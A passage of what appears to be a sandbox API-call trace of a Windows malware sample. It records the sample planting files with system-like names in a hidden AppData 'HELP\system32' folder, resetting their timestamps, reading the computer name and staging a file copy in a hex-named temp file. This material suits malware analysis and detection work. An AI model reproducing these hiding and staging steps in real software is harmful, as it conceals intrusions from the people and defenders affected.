0x1 [0066.806] CloseHandle (hObject=0x14c) returned 1 [0066.806] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx17" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx17")) returned 1 [0066.807] CloseHandle (hObject=0x140) returned 1 [0066.807] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx18" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx18")) returned 1 [0066.807] CloseHandle (hObject=0x15c) returned 1 [0066.807] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx19" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx19")) returned 1 [0066.819] CloseHandle (hObject=0x160) returned 1 [0066.819] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx20" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx20")) returned 1 [0066.820] CloseHandle (hObject=0x158) returned 1 [0066.820] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\xx21" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\xx21")) returned 1 [0066.820] FreeLibrary (hLibModule=0x72d70000) returned 1 [0066.821] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF844.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf844.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.821] GetFileSize (in: hFile=0x158, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ee [0066.821] CreateFileMappingA (hFile=0x158, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x160 [0066.821] MapViewOfFile (hFileMappingObject=0x160, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2c0000 [0066.822] SetFilePointer (in: hFile=0x144, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9c6 [0066.822] GetFileSize (in: hFile=0x144, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9c6 [0066.822] WriteFile (in: hFile=0x144, lpBuffer=0x172db14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x172db0c, lpOverlapped=0x0 | out: lpBuffer=0x172db14*, lpNumberOfBytesWritten=0x172db0c*=0x4, lpOverlapped=0x0) returned 1 [0066.822] WriteFile (in: hFile=0x144, lpBuffer=0x172db1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x172db0c, lpOverlapped=0x0 | out: lpBuffer=0x172db1c*, lpNumberOfBytesWritten=0x172db0c*=0x4, lpOverlapped=0x0) returned 1 [0066.822] WriteFile (in: hFile=0x144, lpBuffer=0x2c0000*, nNumberOfBytesToWrite=0x3ee, lpNumberOfBytesWritten=0x172daf4, lpOverlapped=0x0 | out: lpBuffer=0x2c0000*, lpNumberOfBytesWritten=0x172daf4*=0x3ee, lpOverlapped=0x0) returned 1 [0066.822] UnmapViewOfFile (lpBaseAddress=0x2c0000) returned 1 [0066.823] CloseHandle (hObject=0x160) returned 1 [0066.823] CloseHandle (hObject=0x158) returned 1 [0066.823] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF844.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf844.tmp")) returned 1 [0066.824] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172baf8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.824] GetFileType (hFile=0x158) returned 0x1 [0066.824] GetLastError () returned 0xb7 [0066.824] SetLastError (dwErrCode=0xb7) [0066.824] CloseHandle (hObject=0x158) returned 1 [0066.824] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.824] SetFileTime (hFile=0x158, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0066.824] CloseHandle (hObject=0x158) returned 1 [0066.824] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb")) returned 1 [0066.825] SetLastError (dwErrCode=0x0) [0066.825] GetLastError () returned 0x0 [0066.825] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172baf0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.826] GetFileType (hFile=0x158) returned 0x1 [0066.826] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172bc1c | out: lpSystemTimeAsFileTime=0x172bc1c*(dwLowDateTime=0xf539def0, dwHighDateTime=0x1d3dfba)) [0066.826] GetLastError () returned 0x0 [0066.826] SetLastError (dwErrCode=0x0) [0066.826] GetLastError () returned 0x0 [0066.826] SetLastError (dwErrCode=0x0) [0066.826] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172bc1c | out: lpSystemTimeAsFileTime=0x172bc1c*(dwLowDateTime=0xf539def0, dwHighDateTime=0x1d3dfba)) [0066.826] GetLastError () returned 0x0 [0066.826] SetLastError (dwErrCode=0x0) [0066.826] GetLastError () returned 0x0 [0066.826] SetLastError (dwErrCode=0x0) [0066.826] GetLastError () returned 0x0 [0066.826] SetLastError (dwErrCode=0x0) [0066.827] CloseHandle (hObject=0x158) returned 1 [0066.827] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0066.827] SetFileTime (hFile=0x158, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0066.828] CloseHandle (hObject=0x158) returned 1 [0066.828] FindFirstFileA (in: lpFileName="C:\\ProgramData\\Help\\system32\\msvcrtd.tlb", lpFindFileData=0x172ddb0 | out: lpFindFileData=0x172ddb0) returned 0xffffffff [0066.828] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x172e114, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0066.828] wsprintfA (in: param_1=0x172e21c, param_2="%s\\Help\\%s\\%s" | out: param_1="C:\\ProgramData\\Help\\system32\\csvhost.tlb") returned 40 [0066.828] wsprintfA (in: param_1=0x172e42c, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\csvhost.tlb") returned 59 [0066.828] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\csvhost.tlb", lpFindFileData=0x172ddb8 | out: lpFindFileData=0x172ddb8) returned 0xffffffff [0066.828] FindFirstFileA (in: lpFileName="C:\\ProgramData\\Help\\system32\\csvhost.tlb", lpFindFileData=0x172ddb0 | out: lpFindFileData=0x172ddb0) returned 0xffffffff [0066.828] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x172e114, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0066.828] wsprintfA (in: param_1=0x172e21c, param_2="%s\\Help\\%s\\%s" | out: param_1="C:\\ProgramData\\Help\\system32\\secevent.pdb") returned 41 [0066.828] wsprintfA (in: param_1=0x172e42c, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\secevent.pdb") returned 60 [0066.828] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\secevent.pdb", lpFindFileData=0x172ddb8 | out: lpFindFileData=0x172ddb8) returned 0xffffffff [0066.828] FindFirstFileA (in: lpFileName="C:\\ProgramData\\Help\\system32\\secevent.pdb", lpFindFileData=0x172ddb0 | out: lpFindFileData=0x172ddb0) returned 0xffffffff [0066.828] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x172e114, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0066.828] wsprintfA (in: param_1=0x172e21c, param_2="%s\\Help\\%s\\%s" | out: param_1="C:\\ProgramData\\Help\\system32\\nmcompat.tlb") returned 41 [0066.828] wsprintfA (in: param_1=0x172e42c, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\nmcompat.tlb") returned 60 [0066.828] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\nmcompat.tlb", lpFindFileData=0x172ddb8 | out: lpFindFileData=0x172ddb8) returned 0xffffffff [0066.828] FindFirstFileA (in: lpFileName="C:\\ProgramData\\Help\\system32\\nmcompat.tlb", lpFindFileData=0x172ddb0 | out: lpFindFileData=0x172ddb0) returned 0xffffffff [0066.828] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x172e114, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0066.829] wsprintfA (in: param_1=0x172e21c, param_2="%s\\Help\\%s\\%s" | out: param_1="C:\\ProgramData\\Help\\system32\\oemsndev.sig") returned 41 [0066.829] wsprintfA (in: param_1=0x172e42c, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\oemsndev.sig") returned 60 [0066.829] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\oemsndev.sig", lpFindFileData=0x172ddb8 | out: lpFindFileData=0x172ddb8) returned 0xffffffff [0066.829] FindFirstFileA (in: lpFileName="C:\\ProgramData\\Help\\system32\\oemsndev.sig", lpFindFileData=0x172ddb0 | out: lpFindFileData=0x172ddb0) returned 0xffffffff [0066.829] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x172e114, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0066.829] wsprintfA (in: param_1=0x172e21c, param_2="%s\\Help\\%s\\%s" | out: param_1="C:\\ProgramData\\Help\\system32\\gdb2312.uce") returned 40 [0066.829] wsprintfA (in: param_1=0x172e42c, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\gdb2312.uce") returned 59 [0066.829] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\gdb2312.uce", lpFindFileData=0x172ddb8 | out: lpFindFileData=0x172ddb8) returned 0xffffffff [0066.829] FindFirstFileA (in: lpFileName="C:\\ProgramData\\Help\\system32\\gdb2312.uce", lpFindFileData=0x172ddb0 | out: lpFindFileData=0x172ddb0) returned 0xffffffff [0066.829] wsprintfA (in: param_1=0x172ddf0, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\*.pdb") returned 44 [0066.829] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\*.pdb", lpFindFileData=0x172dba8 | out: lpFindFileData=0x172dba8) returned 0xffffffff [0066.829] wsprintfA (in: param_1=0x172ddf0, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\*.dat") returned 44 [0066.829] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\*.dat", lpFindFileData=0x172dba8 | out: lpFindFileData=0x172dba8) returned 0xffffffff [0066.829] wsprintfA (in: param_1=0x172e324, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32") returned 47 [0066.829] wsprintfA (in: param_1=0x172dde0, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\*.pdb") returned 53 [0066.829] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\*.pdb", lpFindFileData=0x172db98 | out: lpFindFileData=0x172db98) returned 0xffffffff [0066.830] wsprintfA (in: param_1=0x172ddd8, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\*.dat") returned 53 [0066.830] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\*.dat", lpFindFileData=0x172db90 | out: lpFindFileData=0x172db90) returned 0xffffffff [0066.830] CloseHandle (hObject=0x144) returned 1 [0066.830] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172dea4 | out: phkResult=0x72f1ed90*=0x144, lpdwDisposition=0x172dea4*=0x2) returned 0x0 [0066.830] RegQueryValueExA (in: hKey=0x144, lpValueName="ISFValue", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172defc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172defc*=0x0) returned 0x0 [0066.830] RegCloseKey (hKey=0x144) returned 0x0 [0066.830] SetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx", dwFileAttributes=0x27) returned 1 [0066.830] SetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx", dwFileAttributes=0x80) returned 1 [0066.831] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0066.831] wsprintfA (in: param_1=0x172ea88, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0066.831] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\olestdmp.ocx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0066.831] GetFileSize (in: hFile=0x144, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdbc [0066.831] GetComputerNameA (in: lpBuffer=0x172efdc, nSize=0x172e580 | out: lpBuffer="CRH2YWU7", nSize=0x172e580) returned 1 [0066.831] CloseHandle (hObject=0x144) returned 1 [0066.831] wsprintfA (in: param_1=0x172f3f4, param_2="%s\\%s" | out: param_1="system32\\olestdmp.ocx") returned 21 [0066.831] wsprintfA (in: param_1=0x172df28, param_2="%s" | out: param_1="system32\\olestdmp.ocx") returned 21 [0066.831] GetLastError () returned 0xcb [0066.831] SetLastError (dwErrCode=0xcb) [0066.831] lstrlenA (lpString="olestdmp.ocx") returned 12 [0066.831] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x172e360 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0066.831] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpString2="\\" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" [0066.831] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0066.831] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="6F") returned 2 [0066.831] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned 37 [0066.831] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="6C") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned 39 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F", lpString2="6C" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="65") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned 41 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C", lpString2="65" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="73") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned 43 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65", lpString2="73" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="74") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned 45 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573", lpString2="74" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="64") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned 47 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374", lpString2="64" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="6D") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned 49 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464", lpString2="6D" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="70") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned 51 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D", lpString2="70" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="2E") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned 53 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70", lpString2="2E" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="6F") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned 55 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="63") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned 57 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F", lpString2="63" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63" [0066.832] wsprintfA (in: param_1=0x172dcc0, param_2="%02X" | out: param_1="78") returned 2 [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned 59 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63", lpString2="78" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378" [0066.832] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned 61 [0066.832] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378", lpString2="FF.tmp" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" [0066.832] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172dde8 | out: lpFindFileData=0x172dde8) returned 0xffffffff [0066.832] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx", lpFindFileData=0x172dde8 | out: lpFindFileData=0x172dde8) returned 0x358e08 [0066.832] FindClose (in: hFindFile=0x358e08 | out: hFindFile=0x358e08) returned 1 [0066.833] CopyFileA (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\olestdmp.ocx"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), bFailIfExists=1) returned 1 [0066.835] SetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", dwFileAttributes=0x80) returned 1 [0066.835] SetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx", dwFileAttributes=0x80) returned 1 [0066.835] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\olestdmp.ocx")) returned 1 [0066.836] wsprintfA (in: param_1=0x172dce0, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0066.836] wsprintfA (in: param_1=0x172e030, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0066.836] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0066.836] GetFileSize (in: hFile=0x158, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdbc [0066.836] wsprintfA (in: param_1=0x172df28, param_2="%s" | out: param_1="olestdmp.ocx") returned 12 [0066.836] wsprintfA (in: param_1=0x303387, param_2="03 %12d %s\n" | out: param_1="03 3516 olestdmp.ocx\n") returned 29 [0066.836] strlen (_Str="03 3516 olestdmp.ocx\n") returned 0x1d [0066.836] ReadFile (in: hFile=0x158, lpBuffer=0x3033a4, nNumberOfBytesToRead=0xdbc, lpNumberOfBytesRead=0x172e46c, lpOverlapped=0x0 | out: lpBuffer=0x3033a4*, lpNumberOfBytesRead=0x172e46c*=0xdbc, lpOverlapped=0x0) returned 1 [0066.836] CloseHandle (hObject=0x158) returned 1 [0066.837] GetTickCount () returned 0x1f881 [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: 